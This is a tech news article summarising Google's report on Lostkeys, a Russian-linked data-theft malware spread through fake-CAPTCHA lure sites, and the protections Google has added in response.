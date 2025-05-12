Technology News
English Edition

Google Identifies Lostkeys, a Russian Malware That Can Steal Specific Files and Directories

As per Google, Lostkeys is a visual basic script (VBS) type data theft malware.

Written by Akash Dutta, Edited by Siddharth Suvarna | Updated: 12 May 2025 15:59 IST
Google Identifies Lostkeys, a Russian Malware That Can Steal Specific Files and Directories

Photo Credit: Reuters

Google has upgraded Chrome to protect users from websites that might be spreading this malware

Highlights
  • The malware is said to be linked to the Russian threat group Coldriver
  • Lostkeys malware was first observed in January
  • It is spread via a multi-step infection chain, starting with a lure site
Advertisement

Google Threat Intelligence Group (GTIG) shared a report about a new piece of malware last week. The new malware, dubbed Lostkeys, is described as a data theft malware and is said to be linked with the Russian threat group Coldriver. Lostkeys is considered dangerous because it is being spread at the end of a multi-step chain that starts with a lure website. The malware can steal specific files from a hard-coded list of extensions and directories. Additionally, it can also send system information and running processes to the attacker.

New Malware Linked to Russian Threat Group Coldriver Identified

In a blog post, the Mountain View-based tech giant highlighted that the newly discovered malware was first observed in January, followed by multiple observations in March and April. It appears to be the new tool in the arsenal of the threat group Coldriver (also known as UNC4057, Star Blizzard, and Callisto).

Notably, Google highlights that Coldriver is known for running credential phishing against targets such as NATO governments, non-governmental organisations (NGOs), as well as militaries, journalists, and diplomatic officers. The group was associated with the Spica malware in 2024.

The modus operandi (MO) of the group is trickier than typical phishing attacks. First, fake emails impersonating legitimate institutions are shared with victims. These emails contain website links. These are lure websites that feature fake CAPTCHA to convince the victim of their legitimacy. When the user confirms the CAPTCHA, PowerShell is copied to the user's clipboard.

Notably, PowerShell is a command-line shell and scripting language primarily used for system administration, automation, and configuration management in Windows environments. Because PowerShell is built into Windows and has deep system access, it's often abused by attackers to download and execute malware in memory.

Once the PowerShell has been copied, the page prompts the user to execute it via the “run” prompt. Once the user has done that, it triggers the second stage, which is focused on calculating the MD5 hash of the display resolution of the device. It is typically followed by a third stage to evade execution in virtual machines (in case it did not detect MD5 in the second step).

After this, another code execution retrieves and decodes the final payload, which is a visual basic script (VBS) file, otherwise known as Lostkeys. GTIG highlights that it is capable of “stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker.”

Google states that Coldriver typically uses malware to steal emails and contacts from targets; however, at times, it is also known to deploy malware such as Spica to access documents on the target system. Lostkeys also enables a similar goal.

Notably, the tech giant has added all the identified malicious websites, domains, and files to Safe Browsing in Google Chrome to protect users from exploitation. Additionally, it is also sending government-backed attacker alerts to targeted Gmail and Workspace users. These alerts notify users about the threat and encourage them to enable Enhanced Safe Browsing.

Comments

For the latest tech news and reviews, follow Gadgets 360 on X, Facebook, WhatsApp, Threads and Google News. For the latest videos on gadgets and tech, subscribe to our YouTube channel. If you want to know everything about top influencers, follow our in-house Who'sThat360 on Instagram and YouTube.

Further reading: Google, Lostkeys, Coldriver, Malware, Data Security, Cybersecurity
Akash Dutta
Akash Dutta
Akash Dutta is a Senior Sub Editor at Gadgets 360. He is particularly interested in the social impact of technological developments and loves reading about emerging fields such as AI, metaverse, and fediverse. In his free time, he can be seen supporting his favourite football club - Chelsea, watching movies and anime, and sharing passionate opinions on food. More
Samsung Galaxy Buds Core Allegedly Sighted on BIS Site Ahead of Launch in India
Doom: The Dark Ages Leaks Ahead of Launch, Revealing Details on Enemies, UI and More

Related Stories

Google Identifies Lostkeys, a Russian Malware That Can Steal Specific Files and Directories
Comment
Facebook Gadgets360 Twitter Share Tweet Snapchat LinkedIn Reddit Comment google-newsGoogle News

Advertisement

Featured
Follow Us
Latest Videos
More Videos
Tech News in Hindi
More Technology News in Hindi

Advertisement

Popular on Gadgets
Latest Gadgets
Popular Mobile Brands
#Trending Stories
  1. Moto G86 Power 5G Design, Colour Options, Key Features Surface Online
  2. Realme GT 7 Series to Get 7,000mAh Battery With 120W Charging Support
  3. Alcatel V3 Ultra Retail Box Image Reveals Design, Specifications
  4. iOS 19 Will Sync Public Wi-Fi Networks Across All Your Apple Devices
  5. Vivo V50 Elite Edition to Launch in India on This Day
  6. Airtel Black Rs. 399 Plan Now Has IPTV Services With Other Benefits
  7. Samsung Galaxy Watch 8 May Adopt Galaxy Watch Ultra's 'Squircle' Design
  8. Kindle Paperwhite (12th Gen) Review: The E-reader Champ Is Back
#Latest Stories
  1. Microsoft Expands Copilot Pages to All Users, to Offer a Collaborative Space for Creative Projects
  2. Xiaomi 16 With Snapdragon 8 Elite 2 SoC Tipped to Launch in September
  3. OnePlus 15 Tipped to Use Flat 1.5K Display, Snapdragon 8 Elite 2 Chipset
  4. Meta's Stablecoin Plans Likely to Face Regulatory Pushback as US Senator Warren Questions GENIUS Act 
  5. Airtel Black Rs. 399 Plan Now Includes IPTV Services Alongside Existing Broadband, DTH Benefits
  6. Vivo V50 Elite Edition India Launch Date Set for May 15; Teased to Get Round Rear Camera Module
  7. ChatGPT’s Deep Research Feature Can Now Connect With GitHub Repositories
  8. Truecaller Introduces AI-Powered Message IDs for Filtering Messages from Verified Businesses
  9. Realme GT 7 Series Confirmed to Get 7,000mAh Battery With 120W Charging Support
  10. Tecno Spark 40 Series Confirmed to Launch in July; Spark 40 Pro+ to Ship With MediaTek's New Chipset
Gadgets 360 is available in
Follow Us
Download Our Apps
App Store App Store
Available in Hindi
App Store
© Copyright Red Pixels Ventures Limited 2025. All rights reserved.
Trending Products »
Latest Tech News »